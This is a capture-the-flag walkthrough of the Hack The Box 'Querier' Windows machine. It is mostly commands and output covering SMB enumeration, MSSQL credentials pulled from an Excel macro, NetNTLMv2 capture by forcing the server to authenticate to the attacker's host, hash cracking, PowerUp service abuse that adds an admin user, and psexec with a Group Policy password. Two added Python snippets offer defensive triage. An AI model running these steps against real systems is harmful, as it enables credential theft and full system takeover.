Enumeration
Port scanning
Let’s scan the full range of TCP and UDP ports using my tool htbscan.py (you can find it on GitHub as htbscan.py in the Alamot/code-snippets repository):
$ sudo htbscan.py 10.10.10.125 -o querier_enum.txt
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-06-21 16:06:53 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 49671/tcp on 10.10.10.125
Discovered open port 49666/tcp on 10.10.10.125
Discovered open port 135/tcp on 10.10.10.125
Discovered open port 49668/tcp on 10.10.10.125
Discovered open port 139/tcp on 10.10.10.125
Discovered open port 1433/tcp on 10.10.10.125
Discovered open port 49670/tcp on 10.10.10.125
Discovered open port 47001/tcp on 10.10.10.125
Discovered open port 49664/tcp on 10.10.10.125
Discovered open port 49669/tcp on 10.10.10.125
Discovered open port 445/tcp on 10.10.10.125
Discovered open port 49665/tcp on 10.10.10.125
Discovered open port 5985/tcp on 10.10.10.125
Discovered open port 49667/tcp on 10.10.10.125
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-21 19:17 EEST
Nmap scan report for QUERIER (10.10.10.125)
Host is up (0.065s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 14.00.1000.00
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-06-21T15:32:31
|_Not valid after: 2049-06-21T15:32:31
|_ssl-date: 2019-06-21T16:18:33+00:00; +5s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (92%), Microsoft Windows Server 2016 (92%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Longhorn (91%), Microsoft Windows Server 2012 R2 (90%), Microsoft Windows Server 2012 R2 Update 1 (90%), Microsoft Windows Server 2016 build 10586 - 14393 (90%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (90%), Microsoft Windows 10 1511 (90%), Microsoft Windows 10 1703 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 4s, deviation: 0s, median: 4s
| ms-sql-info:
| 10.10.10.125:1433:
| Version:
| name: Microsoft SQL Server
| number: 14.00.1000.00
| Product: Microsoft SQL Server
|_ TCP port: 1433
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-06-21 19:18:34
|_ start_date: N/A
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 64.45 ms 10.10.12.1
2 64.12 ms QUERIER (10.10.10.125)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.45 seconds
Discovering shares
Let’s enumerate the SMB shares:
$ smbmap.py -H 10.10.10.125
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.125...
[+] IP: 10.10.10.125:445 Name: QUERIER
Disk Permissions
---- -----------
[!] Access Denied
Hmmmm… Let’s try a dummy username:
$ smbmap.py -H 10.10.10.125 -u 'type_whatever_you_want_here'
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.125...
[+] IP: 10.10.10.125:445 Name: QUERIER
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ READ ONLY
Reports READ ONLY
Surprise, surprise. It works: the server accepts a guest session for any username (stupid SMB protocol :P). Let’s use Impacket’s smbclient.py to examine the ‘Reports’ share:
$ smbclient.py -no-pass QUERIER/username_does_not_matter@10.10.10.125
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation
Type help for list of commands
# shares
ADMIN$
C$
IPC$
Reports
# use Reports
# ls
drw-rw-rw- 0 Tue Jan 29 01:26:31 2019 .
drw-rw-rw- 0 Tue Jan 29 01:26:31 2019 ..
-rw-rw-rw- 12229 Tue Jan 29 01:26:31 2019 Currency Volume Report.xlsm
# get Currency Volume Report.xlsm
# exit
We can open this xlsm file with LibreOffice, for example. If we examine the macros (Tools → Macros → Edit Macros), we discover some MSSQL credentials:
...
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
...
In case you didn’t know, xlsm, xlsx, docx, etc. are just zip archives (Office Open XML), so we can simply decompress them:
$ unzip Currency\ Volume\ Report.xlsm
Archive: Currency Volume Report.xlsm
inflating: [Content_Types].xml
inflating: _rels/.rels
inflating: xl/workbook.xml
inflating: xl/_rels/workbook.xml.rels
inflating: xl/worksheets/sheet1.xml
inflating: xl/theme/theme1.xml
inflating: xl/styles.xml
inflating: xl/vbaProject.bin
inflating: docProps/core.xml
inflating: docProps/app.xml
$ strings xl/vbaProject.bin
...
Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6
...
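As an added example (not part of the original writeup), the Python below does what the unzip + strings steps above do, so a defender can sweep documents on a share for embedded connection strings before someone else does. The .xlsm it scans is constructed in memory and carries the page’s connection string; the file name and the CFB-like noise bytes around it are made up.

```python
import io
import re
import zipfile

# Constructed stand-in for "Currency Volume Report.xlsm": an OOXML zip whose
# xl/vbaProject.bin holds the page's connection string between bytes of binary noise.
SAMPLE_CONN = (b"Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;"
               b"Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6")

def build_sample_xlsm():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0\x00\x01\x02" * 8 + SAMPLE_CONN + b"\x00\xff" * 8)
    return buf.getvalue()

ASCII_RUN = re.compile(rb"[\x20-\x7e]{8,}")          # the runs that `strings` prints
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")  # VBA streams also hold UTF-16LE text
SECRET = re.compile(r"(?i)\b(pwd|password)\s*=\s*[^;]+")  # ODBC-style password fields

def scan_office_file(data):
    """Return (stream name, connection string with the password masked) for every
    credential-bearing string found in the macro streams of an OOXML document."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.lower().endswith("vbaproject.bin"):
                continue
            blob = z.read(name)
            texts = [m.group().decode("ascii") for m in ASCII_RUN.finditer(blob)]
            texts += [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(blob)]
            for text in texts:
                if SECRET.search(text):
                    findings.append((name, SECRET.sub(lambda m: m.group(1) + "=***", text)))
    return findings
```

The VBA module source inside vbaProject.bin is stored MS-OVBA compressed, so this string-run approach only catches literals that happen to sit uncompressed (as the one on this page did); use oletools’ olevba to get the decompressed source.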
Let’s try to connect to the MS SQL server using Impacket’s mssqlclient.py:
$ mssqlclient.py -windows-auth QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
Neat! Now, let’s try to execute a command using the ‘xp_cmdshell’ procedure:
SQL> EXEC xp_cmdshell "whoami"
[-] ERROR(QUERIER): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
Hmmm, that didn’t work. Let’s try to enable ‘xp_cmdshell’ via sp_configure:
SQL> EXEC sp_configure 'show advanced options',1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell',1;RECONFIGURE;
[-] ERROR(QUERIER): Line 105: User does not have permission to perform this action.
[-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(QUERIER): Line 105: User does not have permission to perform this action.
[-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL>
Nope. Apparently the user ‘reporting’ doesn’t have the privileges needed to reconfigure the server.
Capturing credentials
Well, using our ‘reporting’ account we can try to capture some other credentials: if the SQL server can be made to open a UNC path on a host we control, it authenticates to that host with the account the service runs under. We will use Impacket’s smbserver.py to listen for incoming SMB connections:
$ sudo smbserver.py -smb2support myshare /tmp
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Now we can use the msdat tool (quentinhardy/msdat on GitHub, the Microsoft SQL Database Attacking Tool) to make the SQL server send some traffic towards our SMB server:
$ msdat smbauthcapture -v -s 10.10.10.125 -p 1433 -D QUERIER -U reporting -P 'PcwTWTHRwryjc$c6' --capture 10.10.15.16
[1] (10.10.10.125:1433): Try to capture a SMB authentication with the xp_dirtree, xp_fileexist or xp_getfiledetails method
00:51:22 INFO -: Test all methods allowing to capture a SMB authentication...
00:51:22 INFO -: Capturing SMB Authentication via XP_DIRTREE...
00:51:23 INFO -: No error during the running: you could capture the SMB authentication
[+] You can perhaps capture a SMB authentication with these methods. Check your SMB capture tool !
Let’s see what our SMB server received:
[*] Incoming connection (10.10.10.125,49741)
[*] AUTHENTICATE_MESSAGE (QUERIER\mssql-svc,QUERIER)
[*] User mssql-svc\QUERIER authenticated successfully
[*] mssql-svc::QUERIER:4141414141414141:790d1a20ff18cdb330b3b6e43bca6988:010100000000000000e901777b28d50126ad6b81542b18860000000001001000780051004d005a004a006f004f00730002001000780048004f00540045006b006300610003001000780051004d005a004a006f004f00730004001000780048004f00540045006b00630061000700080000e901777b28d50106000400020000000800300030000000000000000000000000300000590946bc19d0765a150c1c561e8ea40b9f0627e137bb3b8950ad8952e5b6f3930a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310035002e0031003600000000000000000000000000
[*] Connecting Share(1:IPC$)
[-] SMB2_TREE_CONNECT not found S
[-] SMB2_TREE_CONNECT not found S
[*] AUTHENTICATE_MESSAGE (\,QUERIER)
[*] User \QUERIER authenticated successfully
[*] :::00::4141414141414141
[*] Disconnecting Share(1:IPC$)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.125,49741)
[*] Remaining connections []
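As an added example (not part of the original writeup), the Python below parses the NetNTLMv2 line smbserver.py printed above, the way a defender would when triaging a capture: hashcat’s mode 5600 treats it as user::domain:server_challenge:NTProofStr:blob, and the blob is an NTLMv2_CLIENT_CHALLENGE structure whose timestamp and AV_PAIR target info show when the connection was made and which SPN the SQL service believed it was authenticating to.

```python
import struct
from datetime import datetime, timedelta, timezone

# The NetNTLMv2 line smbserver.py logged above, split at its field boundaries
# (hashcat 5600 layout: user::domain:server_challenge:NTProofStr:blob_hex).
BLOB_HEX = "".join([
    "01010000" "00000000" "00e901777b28d501" "26ad6b81542b1886" "00000000",  # RespType, timestamp, client nonce
    "01001000" "780051004d005a004a006f004f007300",  # AvId 1  MsvAvNbComputerName
    "02001000" "780048004f00540045006b0063006100",  # AvId 2  MsvAvNbDomainName
    "03001000" "780051004d005a004a006f004f007300",  # AvId 3  MsvAvDnsComputerName
    "04001000" "780048004f00540045006b0063006100",  # AvId 4  MsvAvDnsDomainName
    "07000800" "00e901777b28d501",                  # AvId 7  MsvAvTimestamp (FILETIME)
    "06000400" "02000000",                          # AvId 6  MsvAvFlags
    "08003000" "30000000" "00000000" "00000000" "00300000"  # AvId 8 MsvAvSingleHost (48 bytes)
    "590946bc19d0765a150c1c561e8ea40b9f0627e137bb3b8950ad8952e5b6f393",
    "0a001000" + "00" * 16,                         # AvId 10 MsvAvChannelBindings
    "09002000" "63006900660073002f00310030002e00310030002e00310035002e0031003600",  # AvId 9 MsvAvTargetName
    "00000000" "00000000",                          # AvId 0 MsvAvEOL, then padding
])
CAPTURED = "mssql-svc::QUERIER:4141414141414141:790d1a20ff18cdb330b3b6e43bca6988:" + BLOB_HEX
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 9: "TargetName"}  # UTF-16LE string pairs

def filetime_to_datetime(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)

def parse_netntlmv2(line):
    """Split a hashcat-5600 style line and decode its NTLMv2_CLIENT_CHALLENGE blob (MS-NLMP 2.2.2.7)."""
    user, _, domain, server_challenge, ntproofstr, blob_hex = line.split(":", 5)
    blob = bytes.fromhex(blob_hex)
    # RespType(1) HiRespType(1) Reserved1(2) Reserved2(4) TimeStamp(8) ChallengeFromClient(8) Reserved3(4)
    resp_type, hi_resp_type, _, _, ts, client_nonce, _ = struct.unpack_from("<BBHIQ8sI", blob, 0)
    if (resp_type, hi_resp_type) != (1, 1):
        raise ValueError("not an NTLMv2_CLIENT_CHALLENGE blob")
    target_info, off = {}, 28
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        off += 4
        if av_id == 0:  # MsvAvEOL terminates the AV_PAIR list; anything after it is padding
            break
        if av_id in AV_NAMES:
            target_info[AV_NAMES[av_id]] = blob[off:off + av_len].decode("utf-16-le")
        off += av_len
    return {"user": user, "domain": domain, "server_challenge": server_challenge,
            "ntproofstr": ntproofstr, "client_nonce": client_nonce.hex(),
            "timestamp": filetime_to_datetime(ts), "target_info": target_info}
```

For this capture the timestamp decodes to 2019-06-21 21:51:22 UTC (00:51:22 in msdat’s EEST log) and TargetName is cifs/10.10.15.16, the host given to --capture, while the NetBIOS/DNS names are the throwaway ones the capture server advertised; an NTLM authentication whose target SPN is a bare IP outside the domain is exactly the kind of event worth alerting on.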
Let’s try to crack this NetNTLMv2 hash using hashcat:
$ hashcat -h | grep -i NetNTLMv2
5600 | NetNTLMv2 | Network Protocols
$ hashcat -m 5600 mssql-svc::QUERIER:4141414141414141:790d1a20ff18cdb330b3b6e43bca6988:010100000000000000e901777b28d50126ad6b81542b18860000000001001000780051004d005a004a006f004f00730002001000780048004f00540045006b006300610003001000780051004d005a004a006f004f00730004001000780048004f00540045006b00630061000700080000e901777b28d50106000400020000000800300030000000000000000000000000300000590946bc19d0765a150c1c561e8ea40b9f0627e137bb3b8950ad8952e5b6f3930a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310035002e0031003600000000000000000000000000 /usr/share/dict/rockyou.txt
...
corporate568
Getting (mssql) shell as mssql-svc
It’s high time to get a shell. We can use a tool I wrote (mssql_shell.py, described in my post “MSSQL shell with file upload capability” on The Portal of Knowledge). First, we have to edit some settings inside the script:
...
MSSQL_SERVER="10.10.10.125"
MSSQL_USERNAME = "QUERIER\\mssql-svc"
MSSQL_PASSWORD = "corporate568"
...
Now, let’s run it:
$ python mssql_shell.py
Successful login: QUERIER\mssql-svc@10.10.10.125
Trying to enable xp_cmdshell ...
CMD mssql-svc@QUERIER C:\Windows\system32> whoami
querier\mssql-svc
CMD mssql-svc@QUERIER C:\Windows\system32> type C:\Users\mssql-svc\Desktop\user.txt
c*****************************6
Privilege escalation
Let’s upload PowerUp.ps1 (from the PowerShellMafia/PowerSploit repository on GitHub):
CMD mssql-svc@QUERIER C:\Windows\system32> cd C:\Users\Public
CMD mssql-svc@QUERIER C:\Users\Public> UPLOAD PowerUp.ps1 C:\Users\Public\PowerUp.ps1
Uploading PowerUp.ps1 to C:\Users\Public\PowerUp.ps1
Data length (b64-encoded): 732KB
100%|██████████| 735/735 [00:50<00:00, 16.63KB/s]
Input Length = 750897
Output Length = 562841
CertUtil: -decode command completed successfully.
MD5 hashes match: 711ca55ca8d9ba4f776ce052417fd98f
*** UPLOAD PROCEDURE FINISHED ***
CMD mssql-svc@QUERIER C:\Users\Public>
Now, let’s run PowerUp.ps1:
CMD mssql-svc@QUERIER C:\Users\Public> powershell -command "& { . .\PowerUp.ps1; Invoke-AllChecks | Out-File -Encoding ASCII powerup_output.txt }"
CMD mssql-svc@QUERIER C:\Users\Public> type powerup_output.txt
...
[*] Checking service permissions...
ServiceName : UsoSvc
Path : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart : True
...
[*] Checking %PATH% for potentially hijackable DLL locations...
ModifiablePath : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
IdentityReference : QUERIER\mssql-svc
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
AbuseFunction : Write-HijackDll -DllPath 'C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
...
[*] Checking for unattended install files...
UnattendPath : C:\Windows\Panther\Unattend.xml
...
[*] Checking for cached Group Policy Preferences .xml files....
None
None
Changed : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File : C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
...
Using the Group Policy password and psexec.py
We can use Impacket’s psexec.py with the Group Policy Preferences password to get a shell as NT AUTHORITY\SYSTEM:
$ psexec.py QUERIER/Administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.10.10.125
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.125.....
[*] Found writable share ADMIN$
[*] Uploading file UNLjBysl.exe
[*] Opening SVCManager on 10.10.10.125.....
[*] Creating service bhCD on 10.10.10.125.....
[*] Starting service bhCD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>cd /users/administrator/desktop
C:\Users\Administrator\Desktop>type root.txt
b******************************2
Hooray!
(Ab)Using UsoSvc service
Let’s examine the “UsoSvc” service:
CMD mssql-svc@QUERIER C:\Users\Public> sc qc "UsoSvc"
[SC] QueryServiceConfig SUCCESS
None
SERVICE_NAME: UsoSvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\system32\svchost.exe -k netsvcs -p
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
Let’s exploit it:
CMD mssql-svc@QUERIER C:\Users\Public> powershell -command "& { . .\PowerUp.ps1; Invoke-ServiceAbuse -ServiceName UsoSvc | Out-File -Encoding ASCII output.txt }"
CMD mssql-svc@QUERIER C:\Users\Public> type output.txt
ServiceAbused Command
------------- -------
UsoSvc net user john Password123! /add && net localgroup Administrators john /add
Let’s see if our exploitation was successful:
CMD mssql-svc@QUERIER C:\Users\Public> net user
User accounts for \\QUERIER
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
john mssql-svc reporting
WDAGUtilityAccount
The command completed successfully.
We could also do other things along these lines, for example (note that sc.exe requires a space after the equals sign):
$ sc config UsoSvc binPath= "cmd /c type C:\Users\Administrator\Desktop\root.txt > C:\a.txt"
That’s all folks!